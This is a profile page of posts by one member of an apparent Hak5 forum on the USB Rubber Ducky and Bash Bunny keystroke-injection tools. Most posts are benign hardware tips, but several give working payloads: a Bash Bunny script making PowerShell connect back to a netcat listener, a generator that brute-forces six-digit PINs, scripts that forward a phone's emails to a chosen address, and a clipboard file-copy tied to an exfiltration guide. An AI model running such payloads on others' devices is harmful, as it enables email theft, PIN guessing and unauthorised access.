Everything posted by Cribbit

  1. Spywll this must be a bug. Hopefully the Hak5 team are working on this for 1.4. After all, if you are quacking a number you want a number. And you can stop a large proportion of payloads working just by turning NumLock off. @Darren Kitchen (sorry to ping you, but just bringing this issue to your attention)
  2. I don't know if this will be any use to anyone, but I created a PoC to demonstrate sending the status/progress of a PowerShell script to the bunny. The PS only sends the numbers 1, 2, (3 or 4) and 5 with sleeps in between, and the bunny just changes its LED depending on the number. When it gets a 5 it quacks the command to close the PowerShell window.

        #!/bin/bash
        trap "kill 0" EXIT
        LED SETUP
        ATTACKMODE RNDIS_ETHERNET HID
        GET SWITCH_POSITION
        GET HOST_IP
        cd /root/udisk/payloads/$SWITCH_POSITION/
        FILE=data.txt
        # Clear old commands
        if [ -f "$FILE" ]; then
            cat /dev/null > "$FILE"
        fi
        LED SPECIAL
        # Set up an echo command to write to file.
        # Using echo as nc only finishes writing when the connection closes.
        CMD="while true; do read i && echo \$i >> $FILE ; done"
        # set nc to run in its own process
        nc -lvn -p 8080 -c "$CMD" &
        # give nc time to start
        sleep 1
        # set the last command to empty
        last="";
        LED ATTACK
        Q DELAY 200
        RUN WIN "powershell"
        Q DELAY 100
        # Create a connection object
        Q STRING "\$client = New-Object System.Net.Sockets.TcpClient;"
        Q DELAY 100
        # set the host and port and connect to nc
        Q STRING "\$client.Connect(\"$HOST_IP\",8080);"
        Q DELAY 100
        # create a stream for that connection
        Q STRING "\$stream = new-object System.IO.StreamWriter \$client.GetStream();"
        Q DELAY 100
        # get powershell to sleep
        Q STRING "Start-Sleep -Seconds 3;"
        Q DELAY 100
        # write the 1 to the stream
        Q STRING "\$stream.WriteLine(\"1\");"
        Q DELAY 100
        # push this over to nc
        Q STRING "\$stream.Flush();"
        Q DELAY 100
        Q STRING "Start-Sleep -Seconds 3;"
        Q DELAY 100
        Q STRING "\$stream.WriteLine(\"2\");"
        Q DELAY 100
        Q STRING "\$stream.Flush();"
        Q DELAY 100
        Q STRING "Start-Sleep -Seconds 3;"
        Q DELAY 200
        # Send a 3 or 4
        Q STRING "\$stream.WriteLine((3+(Get-Random -Maximum 2)).ToString());"
        Q DELAY 100
        Q STRING "\$stream.Flush();"
        Q DELAY 100
        Q STRING "Start-Sleep -Seconds 3;"
        Q DELAY 100
        Q STRING "\$stream.WriteLine(\"5\");"
        Q DELAY 100
        Q STRING "\$stream.Flush();"
        Q DELAY 100
        # Close connection
        Q STRING "\$client.Close();"
        Q DELAY 100
        Q ENTER
        LED SPECIAL
        # forever loop
        while :
        do
            # get the last line of the file removing line feeds (10) and carriage returns (13)
            curr=$(tail -1 "$FILE" | tr -d '\r\n')
            #curr=$(tail -1 "$FILE" | sed -e 's/[\r\n]//g')
            # see if the last command is different to the curr command
            if [ "$last" != "$curr" ] ; then
                # set the last to the current command
                last="$curr"
                # go to the section based on the command
                # most just change LED color and rate of flashing.
                case $curr in
                    1) LED STAGE1;;
                    2) LED SPECIAL2;;
                    3) LED STAGE3;;
                    4) LED STAGE4;;
                    5)
                        LED SPECIAL5
                        Q DELAY 100
                        # close powershell
                        Q STRING "exit"
                        Q ENTER
                        break;;
                esac
            fi
        done
        LED FINISH
        sleep 1

     The PowerShell is all on different lines just to make it easy to read. As I said, I don't know if this will be of any use to anyone, but you never know, it may spark an idea in someone else.
  3. Is Num Lock on? I had this trouble. For some reason when I do a QUACK STRING “8” it sends the KEYPAD 8 (00,00,60), not the top row 8 (00,00,25), and if Num Lock is off I get the UP ARROW.
  4. @rcanpolat glad it's working. The firmware has never been updated to my knowledge. Even on the Hak5 download page it's still 1.0: https://downloads.hak5.org/ducky
  5. If you have access to Linux/Bash you could use it to generate the ducky script you want:

        echo {000000..999999} | xargs -n 1 echo GUI r$'\n'DELAY 100$'\n'STRING C:\\app\\software\\app.exe$'\n'ENTER$'\n'DELAY 1000$'\n'STRING | sed '0~6 s/$/\nENTER\nENTER/g'>Ducky.txt

     It will take some time to execute.
  6. Probably not, as many manufacturers add/remove shortcuts. Here are the shortcuts for a Samsung; I don't know how many are generic to Android:

     Home screen:
       • Apps list - Alt + A

     System:
       • Home - GUI + Enter
       • Back - GUI + Backspace
       • Recent - Alt + Tab
       • Notifications - GUI + N
       • Keyboard shortcuts - GUI + /
       • Lock Screen - GUI + L
       • Switch Languages - SHIFT + SPACE
       • Switch Languages - CTRL + SPACE
       • Switch Languages - LEFT ALT + SHIFT
       • Start/Exit DeX mode - GUI + W

     Applications:
       • Browser - GUI + B
       • Contacts - GUI + C
       • Email - GUI + E
       • Messages - GUI + S
       • Music - GUI + P
       • Calendar - GUI + K
  7. Hi @sputnik-1, there is no loop for the ducky; there is for the Bash Bunny. But there is a payload already created for this. You should watch episode 1217.1 and .2.
  8. The fees you have to pay are import tax and VAT (plus handling charges for the delivery company, if they do the taxes). https://www.gov.uk/goods-sent-from-abroad
  9. I was playing around with the ducky and an Android phone and wrote a payload to forward an email to the address specified. There are two versions, one for Gmail and one for Samsung Email. Use GUI + E to find your default app. I put a comment in for a loop in case you wish to forward more than one.

     GMAIL:

        REM Forwards the first email in the primary section
        REM Only works for phones.
        REM Does not work on tablets as menu bar stops tabs
        REM GMAIL SHORTCUTS https://support.google.com/mail/answer/6594?co=GENIE.Platform%3DAndroid&hl=en&oco=1
        DELAY 1000
        GUI e
        DELAY 1000
        TAB
        DELAY 500
        TAB
        DELAY 500
        ENTER
        REM LOOP FROM HERE
        DELAY 500
        CTRL r
        DELAY 1000
        TAB
        DELAY 500
        SHIFT TAB
        DELAY 500
        BACKSPACE
        DELAY 500
        STRING your@email.com
        CTRL ENTER
        DELAY 1000
        REM Moves to the next email
        RIGHTARROW
        REM GOTO LOOP

     SAMSUNG:

        REM Forwards the first email
        DELAY 1000
        GUI e
        DELAY 1000
        TAB
        DELAY 500
        TAB
        DELAY 500
        TAB
        DELAY 500
        TAB
        DELAY 500
        ENTER
        REM LOOP FROM HERE
        DELAY 500
        SHIFT TAB
        DELAY 500
        LEFTARROW
        LEFTARROW
        LEFTARROW
        LEFTARROW
        RIGHTARROW
        RIGHTARROW
        ENTER
        DELAY 500
        STRING your@email.com
        DELAY 500
        SHIFT TAB
        DELAY 500
        SHIFT TAB
        DELAY 500
        ENTER
        DELAY 500
        REM Moves to the next email
        TAB
        RIGHTARROW
        RIGHTARROW
        LEFTARROW
        ENTER
        REM GOTO LOOP
  10. Hi, just wondering if we are going to get Ducky 2.0 for the Ducky? So we can get the hold functions etc. Also, just a suggestion: can we get a USB-C version, as laptops seem to be dropping all ports but C? Or something like the SanDisk Ultra Dual Drive that has USB-A at one end and USB-C at the other.
  11. It would also be good if it could also act as a sound card / headphone out. So, one, it would suppress the response, then other people in the room would not get wise. The audio could also be saved to a file and analysed for correct responses. But you could also send data over the audio channel(s) (like in the air-gap episode with minimodem). For example, if the sysadmins had a no USB disk mounting configuration.
  12. Hi, probably not, as the computer needs to recognise it before it can work. But there are media keyboard buttons defined in the encoder. Two which may be of interest to you are (MEDIA_MUTE or MUTE) and (MEDIA_VOLUME_DEC or VOLUMEDOWN). The reason for two names for each is the second is an alias. You could give them a go and see.
  13. Cribbit

    Hak5 Gear

    Are you talking about the shoulder bag? I know one of the authorized resellers sells them, fonefunshop in the UK, but they are expensive! And you can get something similar much cheaper if you search online, but it will not have the Hak5 logos on it. https://www.fonefunshop.com/specialist-products/hak5/hak5-tactical-edc-bag-every-day-carry-shoulder-bag.html https://shop.hak5.org/pages/authorized-resellers
  14. I think you just need parental control software, which can be installed on PCs (and phones). You'll have to check if they are legal to use where you live. https://www.techradar.com/best/parental-control
  15. I don't think there is any documentation but the code for the encoder is open source: https://github.com/hak5darren/USB-Rubber-Ducky/blob/master/Encoder/src/Encoder.java
  16. REM Copies the contents of c.txt on the root of the ducky to the clipboard
      REM Follow the steps in the link below to set up Ducky
      REM https://docs.hak5.org/hc/en-us/articles/360010555213-Stealing-Files-with-the-USB-Rubber-Ducky-USB-Exfiltration-Explained
      DELAY 1000
      GUI r
      DELAY 100
      STRING powershell ".(Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''_''').Name+'c.txt')))"
      ENTER
  17. Hey ebmar, it most likely depends on how locked down your system is. But I suggest you watch episode 2112/2113 “Stealing Files with the USB Rubber Ducky”. Instead of copying a file to the ducky, copy it from the ducky. Then open it in Notepad, then Ctrl-A and Ctrl-C it. You’ll need to install the twin duck firmware. Hope this helps get you started.
  18. Just throwing this out as an idea for a new device emulation for the Bash Bunny: a USB microphone, with a new command to play an audio file stored on it. So you could plug it in to a smart device and in your audio file you have a voice say “Hey Google/Alexa/Siri/Cortana go to this site”, “Order 500 copies of ...” or “set alarm for 2am”.